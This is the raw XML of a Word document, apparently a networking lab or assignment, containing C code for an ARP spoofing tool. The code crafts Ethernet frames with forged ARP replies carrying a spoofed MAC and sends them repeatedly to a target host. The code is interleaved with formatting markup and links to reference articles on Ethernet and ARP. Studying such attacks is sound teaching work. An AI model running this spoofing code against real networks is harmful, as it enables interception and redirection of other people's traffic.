        <w:t>argv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[5]);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exit(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EXIT_FAILURE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printf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"Starting ARP spoofing on interface %s\n"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interface);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lastRenderedPageBreak/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Create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socket to look up interface MAC address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socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) &lt; 0)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perror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 xml:space="preserve">"socket() failed for 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ioctl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exit(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EXIT_FAILURE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Get source MAC address using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ioctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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memset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&amp;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ifr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0,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sizeof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ifr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strncpy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ifr.ifr_name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interface,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sizeof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ifr.ifr_name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 - 1);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ioctl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SIOCGIFHWADDR, &amp;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ifr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 &lt; 0)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perror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ioctl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() failed to get source MAC address"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exit(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EXIT_FAILURE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close(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memcpy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ifr.ifr_hwaddr.sa_data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6);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Print source MAC address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printf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"MAC address for interface %s: %02x:%02x:%02x:%02x:%02x:%02x\n"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interface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[0],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[1],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[2],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[3],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[4],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[5]);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Get interface index for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sockaddr_ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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memset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&amp;device, 0,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sizeof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(device));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device.sll_ifindex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if_nametoindex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(interface)) == 0)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perror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if_nametoindex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() failed"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exit(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EXIT_FAILURE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printf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"Interface index: %d\n"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device.sll_ifindex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Convert source IP to binary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((status =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inet_pton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(AF_INET,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src_ip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&amp;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arphdr.sender_ip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)) != 1)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fprintf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stderr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inet_pton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() failed for source IP %s: %s\n"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    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src_ip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status ==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0 ?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"Invalid address</w:t>
      </w:r>
      <w:proofErr w:type="gram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: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strerror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errno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exit(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EXIT_FAILURE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Resolve target IP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memset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&amp;hints, 0,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sizeof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(hints));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hints.ai_family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AF_INET;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hints.ai_socktype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SOCK_STREAM;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hints.ai_flags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|= AI_CANONNAME;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((status =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getaddrinfo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(target,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NULL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&amp;hints, &amp;res)) != 0)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fprintf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stderr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getaddrinfo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() failed for target %s: %s\n"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target,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gai_strerror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(status));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exit(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EXIT_FAILURE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ipv4 = (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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sockaddr_in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*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)res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-&gt;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ai_addr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memcpy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&amp;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arphdr.target_ip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&amp;ipv4-&gt;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sin_addr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4);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freeaddrinfo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res);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Configure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sockaddr_ll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for raw packet sending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device.sll_family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AF_PACKET;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memcpy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device.sll_addr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6);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device.sll_halen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6;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Build ARP header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arphdr.htype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htons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1);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Ethernet (1)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arphdr.ptype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htons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ETH_P_IP);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IPv4 (0x0800)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arphdr.hlen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6;        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MAC address length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arphdr.plen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4;        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IPv4 address length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arphdr.opcode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htons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ARPOP_REPLY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);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ARP reply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memcpy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arphdr.sender_mac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spoofed_mac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6);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Spoofed MAC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memcpy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arphdr.target_mac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dst_mac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6);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Target MAC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Build Ethernet frame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lastRenderedPageBreak/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frame_length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6 + 6 + 2 +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ARP_HDRLEN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;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Dest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MAC +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Src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MAC +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EtherType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+ ARP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memcpy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ether_frame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dst_mac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6);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Destination MAC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memcpy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ether_frame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+ 6,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src_mac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6);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Source MAC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ether_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frame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12] = ETH_P_ARP / 256;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EtherType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(0x0806)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ether_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frame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[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13] = ETH_P_ARP % 256;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memcpy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ether_frame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+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ETH_HDRLEN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&amp;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arphdr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ARP_HDRLEN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);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ARP payload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printf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"Ethernet frame prepared\n"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Create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raw socket for sending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socket(PF_PACKET, SOCK_RAW,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htons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(ETH_P_ALL))) &lt; 0)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perror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"socket() failed for sending"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exit(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EXIT_FAILURE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Send 10 ARP replies with delay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for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= 0;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&lt;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SEND_COUNT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;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++)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((bytes =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sendto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ether_frame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frame_length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, 0, (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struct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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sockaddr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*)&amp;device,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sizeof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(device))) &lt;= 0) {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perror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sendto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() failed"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exit(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EXIT_FAILURE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printf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"Sent %d bytes (ARP reply %d/%d)\n"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, bytes,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+ 1,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SEND_COUNT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usleep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SEND_DELAY_US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);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// 100ms delay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// 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>Clean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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> up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close(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sd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printf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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"ARP spoofing complete\n"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);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  <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return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ascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXIT_SUCCESS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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F65E81" w:rsidRDefault="00F65E81" w:rsidP="00F65E8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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F65E81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CF" w:rsidRDefault="002A03CF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002A03CF" w:rsidRDefault="002A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scadia Mono">
    <w:altName w:val="DejaVu Sans Condensed"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000001" w:usb1="4000F9FB" w:usb2="0004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177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40BD" w:rsidRDefault="00AD30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E5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440BD" w:rsidRDefault="00244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CF" w:rsidRDefault="002A03CF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002A03CF" w:rsidRDefault="002A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E0427"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E3AFB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04"/>
    <w:rsid w:val="00007487"/>
    <w:rsid w:val="000568C5"/>
    <w:rsid w:val="000B5028"/>
    <w:rsid w:val="00117090"/>
    <w:rsid w:val="001958D5"/>
    <w:rsid w:val="001D156A"/>
    <w:rsid w:val="00211D06"/>
    <w:rsid w:val="00213894"/>
    <w:rsid w:val="002354E5"/>
    <w:rsid w:val="002440BD"/>
    <w:rsid w:val="00251F17"/>
    <w:rsid w:val="00291DB7"/>
    <w:rsid w:val="002A03CF"/>
    <w:rsid w:val="002D1D23"/>
    <w:rsid w:val="002E692A"/>
    <w:rsid w:val="0031238C"/>
    <w:rsid w:val="00407DFE"/>
    <w:rsid w:val="00455EA3"/>
    <w:rsid w:val="00460DFF"/>
    <w:rsid w:val="004B3F24"/>
    <w:rsid w:val="0050471A"/>
    <w:rsid w:val="00536E22"/>
    <w:rsid w:val="005E3EE2"/>
    <w:rsid w:val="0063295F"/>
    <w:rsid w:val="006459DA"/>
    <w:rsid w:val="00691622"/>
    <w:rsid w:val="006B229C"/>
    <w:rsid w:val="006B3205"/>
    <w:rsid w:val="006D3634"/>
    <w:rsid w:val="0070397B"/>
    <w:rsid w:val="00710FFD"/>
    <w:rsid w:val="007567E5"/>
    <w:rsid w:val="00780010"/>
    <w:rsid w:val="00796ACE"/>
    <w:rsid w:val="007C55B4"/>
    <w:rsid w:val="007D6F8F"/>
    <w:rsid w:val="008200F1"/>
    <w:rsid w:val="00860DD0"/>
    <w:rsid w:val="00861DDF"/>
    <w:rsid w:val="008B112D"/>
    <w:rsid w:val="008E5014"/>
    <w:rsid w:val="00927E53"/>
    <w:rsid w:val="00982539"/>
    <w:rsid w:val="00992F85"/>
    <w:rsid w:val="009F34D4"/>
    <w:rsid w:val="00A222B8"/>
    <w:rsid w:val="00A47923"/>
    <w:rsid w:val="00AD3004"/>
    <w:rsid w:val="00B20DA5"/>
    <w:rsid w:val="00B24745"/>
    <w:rsid w:val="00B93060"/>
    <w:rsid w:val="00BB3D6E"/>
    <w:rsid w:val="00BE4B1C"/>
    <w:rsid w:val="00BF28A4"/>
    <w:rsid w:val="00C167E0"/>
    <w:rsid w:val="00C61B55"/>
    <w:rsid w:val="00CC3FCF"/>
    <w:rsid w:val="00CF6839"/>
    <w:rsid w:val="00D74940"/>
    <w:rsid w:val="00DB3B51"/>
    <w:rsid w:val="00DC55EA"/>
    <w:rsid w:val="00E064A4"/>
    <w:rsid w:val="00E1276F"/>
    <w:rsid w:val="00EB6975"/>
    <w:rsid w:val="00EF2EA0"/>
    <w:rsid w:val="00F00DB3"/>
    <w:rsid w:val="00F315A3"/>
    <w:rsid w:val="00F52E0F"/>
    <w:rsid w:val="00F65E81"/>
    <w:rsid w:val="00F9463D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181D1-DF9F-411E-88F5-1A2F4BDC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F1"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr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0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0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tr-TR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D30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tr-TR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AD3004"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
      <w:lang w:val="tr-TR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00AD30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3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04"/>
    <w:rPr>
      <w:lang w:val="tr-TR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AD3004"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nowrap">
    <w:name w:val="nowrap"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AD3004"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00AD3004"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00AD3004"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="tr-T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en.wikipedia.org/wiki/Ethernet_II" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Frame_check_sequen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Interpacket_gap" TargetMode="External"/><Relationship Id="rId34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en.wikipedia.org/wiki/Ethertype" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ethernet_II" TargetMode="Externa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802.1Q" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cyclic_redundancy_check" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Octet_(computing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en.wikipedia.org/wiki/Ethertyp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Address_Resolution_Protocol" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/802.1Q" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Interpacket_gap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en.wikipedia.org/wiki/Frame_check_sequenc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n.wikipedia.org/wiki/Ethernet_frame" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Octet_(computing)" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cyclic_redundancy_check" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item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58DA90-BD51-4C84-B985-894AD5A24A92}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CB98B359-3EEC-4E46-8279-FB2FACA2AD9C}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C8B7876F-4141-4023-8651-272E7D498D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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-07T09:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-07T09:35:00Z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